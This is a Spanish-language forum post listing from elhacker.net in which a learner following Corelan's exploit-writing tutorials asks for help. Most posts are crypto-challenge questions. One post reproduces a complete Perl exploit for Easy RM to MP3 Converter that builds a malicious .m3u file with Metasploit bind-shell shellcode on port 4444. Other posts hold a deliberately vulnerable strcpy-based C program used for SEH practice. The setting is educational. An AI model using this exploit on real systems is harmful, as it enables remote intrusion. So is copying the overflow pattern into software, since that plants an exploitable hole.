elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado:


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Bugs y Exploits / Re: Problemas con un SEHTEST en: 30 Noviembre 2016, 22:23
Disculpa por ser insistente pero me puedes dar un ejemplo para poder guiarme. Gracias
2  Seguridad Informática / Bugs y Exploits / Re: Problemas con un SEHTEST en: 30 Noviembre 2016, 19:57
Este es el codigo, que quiero compilar, ya observe la sintaxis , pero aun no me compila :(

Código
  1. #include<stdio.h>
  2. #include<string.h>
  3. #include<windows.h>
  4.  
  5. int ExceptionHandler(void);
  6. int main(int argc,char *argv[]){
  7.  
  8. char temp[512];
  9.  
  10. printf("Application launched");
  11.  
  12. __try {
  13.    strcpy(temp,argv[1]);
  14.    }__except ( ExceptionHandler() ){
  15. }
  16. return 0;
  17. }
  18. int ExceptionHandler(void){
  19. printf("Exception");
  20. return 0;
  21. }
  22.  


Mod: Los códigos deben ir en etiquetas GeSHi
3  Seguridad Informática / Bugs y Exploits / Problemas con un SEHTEST en: 30 Noviembre 2016, 19:49
Estimado estoy intentando compilar este codigo hecho en C, pero me cota un error, espero que me ayude, para seguir con el manual de Corelean de Creacion de Exploit.


Gracias por su ayuda.
4  Seguridad Informática / Bugs y Exploits / Re: Creación de Exploits 1 por corelanc0d3r en: 30 Noviembre 2016, 19:43
Justamente estaba pensando que er tema de idioma del S.O , porque para las pruebas uso un Windows XP SP3 en Español, sin embargo el exploit esta en Ingles, cuando lo cambie de idioma, me seguia presentado el mismo error, a pesar de que se abrio el puerto 4444, en modo listening, por lo que yo creo es que me falta habilitar el telnet y asi pueda ingresar , No estoy seguro con mi teoria. Espero un apoyo. Gracias.

Código
  1. # Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
  2. # Written by Peter Van Eeckhoutte
  3. # http://www.corelan.be
  4. # Greetings to Saumil and SK :-)
  5. #
  6. # tested on Windows XP SP3 (En)
  7. #
  8. #
  9. #
  10. my $file= "exploitrmtomp12.m3u";
  11.  
  12. my $junk= "A" x 26042;
  13. my $eip = pack('V',0x01d4f23a);  #jmp esp from MSRMCcodec02.dll
  14.  
  15. my $shellcode = "\x90" x 25;
  16.  
  17. # windows/shell_bind_tcp - 703 bytes
  18. # http://www.metasploit.com
  19. # Encoder: x86/alpha_upper
  20. # EXITFUNC=seh, LPORT=4444, RHOST=
  21. $shellcode=$shellcode."\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
  22. "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
  23. "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
  24. "\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42" .
  25. "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
  26. "\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
  27. "\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
  28. "\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
  29. "\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
  30. "\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
  31. "\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
  32. "\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
  33. "\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
  34. "\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
  35. "\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
  36. "\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
  37. "\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
  38. "\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
  39. "\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
  40. "\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
  41. "\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
  42. "\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42" .
  43. "\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" .
  44. "\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43" .
  45. "\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42" .
  46. "\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48" .
  47. "\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51" .
  48. "\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42" .
  49. "\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42" .
  50. "\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48" .
  51. "\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43" .
  52. "\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e" .
  53. "\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50" .
  54. "\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50" .
  55. "\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a" .
  56. "\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50" .
  57. "\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45" .
  58. "\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
  59. "\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
  60. "\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
  61. "\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
  62. "\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
  63. "\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
  64. "\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
  65. "\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
  66. "\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
  67. "\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
  68. "\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
  69. "\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
  70. "\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
  71. "\x50\x41\x41";
  72.  
  73. open($FILE,">$file");
  74. print $FILE $junk.$eip.$shellcode;
  75. close($FILE);
  76. print "m3u File Created successfully\n";

Mod: Códigos van entre etiquetas GeSHi.
5  Programación / Programación C/C++ / Exploit Writing de Corelan, capitulo 3 en: 30 Noviembre 2016, 18:14
Buenass tardes, tengo probleas con un codigo, estoy siguiendo el manual de Exploit Writing de Corelan, estoy en el capitulo 3, en donde muestra SEH, y me brinda un codigo C, lo compilo y me sale error. les adjunto la foto , posdata el codigo es :

Código
  1. #include<stdio.h>
  2. #include<string.h>
  3. #include<windows.h>
  4.  
  5. int ExceptionHandler(void);
  6. int main(int argc,char *argv[]){
  7.  
  8. char temp[512];
  9.  
  10. printf("Application launched");
  11.  
  12. __try {
  13.  
  14.    strcpy(temp,argv[1]);
  15.  
  16.    } __except ( ExceptionHandler() ){
  17. }
  18. return 0;
  19. }
  20. int ExceptionHandler(void){
  21. printf("Exception");
  22. return 0;
  23. }

ESPERO SU APOYO. GRACIAS



Mod: Los códigos deben ir en etiquetas GeSHi, los titulos deben ser descriptivos, tema movido
6  Seguridad Informática / Bugs y Exploits / Creación de Exploits 1 por corelanc0d3r en: 27 Noviembre 2016, 16:36
Buenas dias, estuve leyendo el manual de creacion de  exploit de corelancoder, del capitulo me quede en ingresar una shellcode para ingresar por via telnet. sin embargo no me funciona abre el puerto pero cuando intento ingresar por putty a ese servicio telnet. no puedo.
7  Seguridad Informática / Desafíos - Wargames / Re: Ayuda en Criptografia Leonardo de pisa en: 6 Abril 2015, 04:25
Justamente por lo que leí se podría usar el número de oro , que podría buscar la letra mas cercano y así con la secuencia de fibonacci encontrarlo es un reto criptologico , en warzone de esta web :)
8  Seguridad Informática / Desafíos - Wargames / Re: Ayuda en Criptografia Leonardo de pisa en: 5 Abril 2015, 12:57
Gracias :D Lo voy a leer detalladamente :D, consulta quiero descifrar un mensaje , pero al momento de realizarlo no sale un mensaje claro.

El msj es este:

matienymustianbastentiqueabmusolrirstuvnqueilscontresccamorquesnnuncaabulsoksqeucnslsiaa
9  Seguridad Informática / Desafíos - Wargames / Ayuda en Criptografia Leonardo de pisa en: 5 Abril 2015, 12:12
Lei  la teoria pero no tengo ni idea de como aplicarlo. ayuda por fa
10  Seguridad Informática / WarZone / Re: Criptografia_0 en: 5 Abril 2015, 09:46
Lo resolvi pero me sale dos codigos ASCII que no tiene coincidencia, por favor una pista   :(
Páginas: [1]
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines